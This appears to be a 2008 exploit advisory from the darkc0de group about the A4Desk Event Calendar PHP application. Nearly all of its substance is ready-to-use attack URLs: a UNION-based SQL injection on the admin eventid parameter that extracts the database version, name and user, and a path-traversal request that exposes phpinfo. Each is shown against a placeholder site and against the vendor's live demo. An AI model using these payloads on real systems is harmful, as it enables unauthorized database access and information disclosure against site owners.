A4Desk Event Calendar suffers from remote SQL injection and file disclosure vulnerabilities.
c8c44848d3a32c86b6790b50610de6e840316aac3f8525d9a228fb434d439b8f
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz #
# and all darkc0de and NikTrix members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com & niktrix.info
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Title: A4Desk Event Calendar Multiple Remote Vulnerabilities
#
#
# VEndor: http://php.a4desk.com/calendar/
#
#
###########################################################
#
# Exploit 1 :A4Desk Event Calendar (index.php?eventid) Sql Injection
#
###########################################################
POC :-
http://www.site.com/[path]/admin/index.php?eventid=-1+union+all+select+1,concat_ws(version(),0x3a,database(),0x3a,user()),3,4,5,6--
Live Dem0:-
http://php.a4desk.com/calendar/demo/admin/index.php?eventid=-1+union+all+select+1,concat_ws(version(),0x3a,database(),0x3a,user()),3,4,5,6--
###########################################################
#
# Exploit 2 : A4Desk Event Calendar PhP Zend file disclosure Vulnerability
#
###########################################################
POC :-
http://www.site.com/[path]/index.php?date=-14462&v=../../../phpinfo
Live Dem0 :-
http://php.a4desk.com/calendar/demo/index.php?date=-14462&v=../../../phpinfo
###########################################################
#
# Bug discovered : 1 oct 2008
#
###########################################################